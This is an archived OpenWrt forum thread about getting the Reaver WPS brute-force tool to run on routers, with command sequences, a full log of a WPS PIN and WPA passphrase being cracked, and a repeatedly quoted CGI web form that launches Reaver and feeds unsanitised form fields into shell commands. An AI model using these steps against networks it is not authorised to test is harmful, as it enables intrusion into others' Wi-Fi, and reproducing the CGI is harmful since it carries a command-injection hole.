so I'm unlucky, and i cannot use reawer-wps, am I?
Thank you for help me.
(Last edited by somla on 4 May 2012, 18:24)
Topic: Reaver WPS
The content of this topic has been archived between 2 Apr 2018 and 14 Apr 2018. There are no obvious gaps in this topic, but there may still be some posts missing at the end.
Page 2 of 2
Put please Makefile for version 1.4.Est only 1.2 and 1.3, but they
] Waiting for beacon from xx: xx: xx: xx: xx: xx
[] Switching mon0 to channel 2
[] Switching mon0 to channel 3
[] Switching mon0 to channel 4
[] Switching mon0 to channel 5
[] Switching mon0 to channel 6
[] Switching mon0 to channel 7
[] Switching mon0 to channel 8
[] Switching mon0 to channel 9
[] Switching mon0 to channel 10
[] Switching mon0 to channel 11
[] Switching mon0 to channel 12
[] Switching mon0 to channel 13
[] Switching mon0 to channel 14
[] Switching mon0 to channel 1
[] Switching mon0 to channel 2
[] Switching mon0 to channel 3
airmon-ng and airodump-ng start and run normally
Trendnet 673GRU(ar71xx) Openwt/trunk
tested on the AP has been hacked before
(Last edited by sakatgg on 11 Jun 2012, 15:30)
So no way of running this on big endian like Fonera or Atheros 7100 ?
Only BCM 2.6 works because it is little endian it seems ... ?
Reaver 1.4 worked completely on Buffalo WHR-G300N(Ralink RT3052) and OpenWRT trunk r30461
iwconfig wlan0 essid RalinkInitAP channel 6
ifconfig wlan0 up
airmon-ng start wlan0
reaver -i mon0 -b XX-XX-XX-XX-XX-XX -c 6 -vv
:
[+] 96.51% compl[10600.100000] device mon0 left promiscuous mode
ete @ 1970-01-01 02:56:40 (5 seconds/pin)
[10601.110000] device mon0 entered promiscuous mode
[+] Trying pin 12666126
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sen[10604.940000] device mon0 left promiscuous mode
ding M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[10605.950000] device mon0 entered promiscuous mode
[+] Trying pin 12666126
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[10610.060000] device mon0 left promiscuous mode
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 10355 seconds
[+] WPS PIN: '12666126'
[+] WPA PSK: 'abcdefg12345678'
[+] AP SSID: 'RalinkInitAP'
root@OpenWrt:/#
It took about three hours.
Buffalo WHR-G300N (v1) CPU Ralink RT3052 is little endian.
CONFIG_CPU_LITTLE_ENDIAN=y
CONFIG_CPU_MIPS32=y
I would like to know why Reaver can not run big endian.
It would be pretty epic because then we can have the full arsenal of penetration testing tools for wireless working !
I made simple webui form for reaver-wps by Haserl.
I copied this cgi file in openwrt /www/cgi-bin/r.cgi of Buffalo WHR-G300N.
start http://192.168.1.1/cgi-bin/r.cgi
reaver with arg -D means run background (daemon)
#!/usr/bin/haserl
content-type: text/html
<html>
<body>
<form action="<? echo -n $SCRIPT_NAME ?>" method="POST">
<h1>Reaver Web UI Form</h1>
<input type=hidden name=action value=post>
<? #
if [ "$GET_halt" = "on" ]; then
echo -n "<pre>"
pkill -f reaver
rm /tmp/reaverlog
airmon-ng stop mon0
echo -n "<p>Reaver Stopped</p></pre>"
fi
?>
<p>__essid_: <input type=text name=essid value="<? echo -n $FORM_essid ?>" size=20></p>
<p>__MAC_: <input type=text name=mac value="<? echo -n $FORM_mac ?>" size=20></p>
<p>channel: <input type=text name=ch value="<? echo -n $FORM_ch ?>" size=2></p>
<pre>
<? #
if [ "$FORM_action" = "post" ]; then
if ! [ -f /tmp/reaverlog ]; then
iwconfig wlan0 essid $FORM_essid channel $FORM_ch
ifconfig wlan0 up
airmon-ng start wlan0
reaver -i mon0 -b $FORM_mac -D -c $FORM_ch -o /tmp/reaverlog -vv
fi
tail -n 20 /tmp/reaverlog
?>
</pre>
<p><input type=submit value="Reload">
<input type=button value="Stop" onClick="location.href='<? echo -n $SCRIPT_NAME ?>?halt=on'"></p>
<? else ?>
<p><input type=submit value="Start"></p>
<? fi ?>
</form>
</body>
</html>After starting this cgi form browser, Reaver works with a router independent.
video is here
http://www.youtube.com/watch?v=aIPiBcH8FPo
(Last edited by atc500fast on 15 Aug 2012, 02:04)
As mentioned in the reaver bugtrack, http://code.google.com/p/reaver-wps/issues/detail?id=46 , reaver is in the trunk now (feed package, net/reaver). The patches should fix the big-endian problem.
However it doesn't work for me on tp-link wr1043nd.
Can anyone test it?
Has anyone tried it on the old Fonera 2100?
It would be very interesting to leave it running with a battery pack and a solar pannel.
(Last edited by verysofttoiletpaper on 15 Feb 2013, 21:43)
r.cgi on tplink 1043nd no start
atc500fast wrote:
I made simple webui form for reaver-wps by Haserl.
I copied this cgi file in openwrt /www/cgi-bin/r.cgi of Buffalo WHR-G300N.
start http://192.168.1.1/cgi-bin/r.cgi
reaver with arg -D means run background (daemon)#!/usr/bin/haserl content-type: text/html <html> <body> <form action="<? echo -n $SCRIPT_NAME ?>" method="POST"> <h1>Reaver Web UI Form</h1> <input type=hidden name=action value=post> <? # if [ "$GET_halt" = "on" ]; then echo -n "<pre>" pkill -f reaver rm /tmp/reaverlog airmon-ng stop mon0 echo -n "<p>Reaver Stopped</p></pre>" fi ?> <p>__essid_: <input type=text name=essid value="<? echo -n $FORM_essid ?>" size=20></p> <p>__MAC_: <input type=text name=mac value="<? echo -n $FORM_mac ?>" size=20></p> <p>channel: <input type=text name=ch value="<? echo -n $FORM_ch ?>" size=2></p> <pre> <? # if [ "$FORM_action" = "post" ]; then if ! [ -f /tmp/reaverlog ]; then iwconfig wlan0 essid $FORM_essid channel $FORM_ch ifconfig wlan0 up airmon-ng start wlan0 reaver -i mon0 -b $FORM_mac -D -c $FORM_ch -o /tmp/reaverlog -vv fi tail -n 20 /tmp/reaverlog ?> </pre> <p><input type=submit value="Reload"> <input type=button value="Stop" onClick="location.href='<? echo -n $SCRIPT_NAME ?>?halt=on'"></p> <? else ?> <p><input type=submit value="Start"></p> <? fi ?> </form> </body> </html>After starting this cgi form browser, Reaver works with a router independent.
video is here
http://www.youtube.com/watch?v=aIPiBcH8FPo
To revive the topic: I've made everything as described. Doublechecked. When I start r.cgi there's output saying that there's no such direktoy and can not start cgi program.
I'm using Wrap 1E with latest Attitude Adjustment 12,09 x86.
atc500fast wrote:
I made simple webui form for reaver-wps by Haserl.
I copied this cgi file in openwrt /www/cgi-bin/r.cgi of Buffalo WHR-G300N.
start http://192.168.1.1/cgi-bin/r.cgi
reaver with arg -D means run background (daemon)#!/usr/bin/haserl content-type: text/html <html> <body> <form action="<? echo -n $SCRIPT_NAME ?>" method="POST"> <h1>Reaver Web UI Form</h1> <input type=hidden name=action value=post> <? # if [ "$GET_halt" = "on" ]; then echo -n "<pre>" pkill -f reaver rm /tmp/reaverlog airmon-ng stop mon0 echo -n "<p>Reaver Stopped</p></pre>" fi ?> <p>__essid_: <input type=text name=essid value="<? echo -n $FORM_essid ?>" size=20></p> <p>__MAC_: <input type=text name=mac value="<? echo -n $FORM_mac ?>" size=20></p> <p>channel: <input type=text name=ch value="<? echo -n $FORM_ch ?>" size=2></p> <pre> <? # if [ "$FORM_action" = "post" ]; then if ! [ -f /tmp/reaverlog ]; then iwconfig wlan0 essid $FORM_essid channel $FORM_ch ifconfig wlan0 up airmon-ng start wlan0 reaver -i mon0 -b $FORM_mac -D -c $FORM_ch -o /tmp/reaverlog -vv fi tail -n 20 /tmp/reaverlog ?> </pre> <p><input type=submit value="Reload"> <input type=button value="Stop" onClick="location.href='<? echo -n $SCRIPT_NAME ?>?halt=on'"></p> <? else ?> <p><input type=submit value="Start"></p> <? fi ?> </form> </body> </html>After starting this cgi form browser, Reaver works with a router independent.
video is here
http://www.youtube.com/watch?v=aIPiBcH8FPo
Forgive me for my noobness but how i can implement this html code @atc500fast ?
Thanks
mikrostart wrote:
When I start r.cgi there's output saying that there's no such direktoy and can not start cgi program.
to make reaver.cgi work, you have to install haserl:
opkg install haserl
micsux wrote:
mikrostart wrote:When I start r.cgi there's output saying that there's no such direktoy and can not start cgi program.
to make reaver.cgi work, you have to install haserl:
opkg install haserl
I need just install this package and put the .cgi on the right folder then run it from web browser?
henrique.h12 wrote:
I need just install this package and put the .cgi on the right folder then run it from web browser?
Exactly
micsux wrote:
henrique.h12 wrote:I need just install this package and put the .cgi on the right folder then run it from web browser?
Exactly
I have this error:
Access to this resource is forbidden
I set up the right to 0755 and got this:
Unable to launch the requested CGI program:
/www/cgi-bin/r.cgi: No such file or directory
totaly lost here ;/
micsux wrote:
henrique.h12 wrote:I need just install this package and put the .cgi on the right folder then run it from web browser?
Exactly
Could you please help me?
Thanks.
reaver 1.5.2 community mod compiled and tested on ramips, also with older libpcap revision should run without segfaults. the image it is included in has been modified for testing purposes and some things may be wrong or non working for you. (mainly 2.4 wifi)
you know how to run it 
The discussion might have continued from here.
Page 2 of 2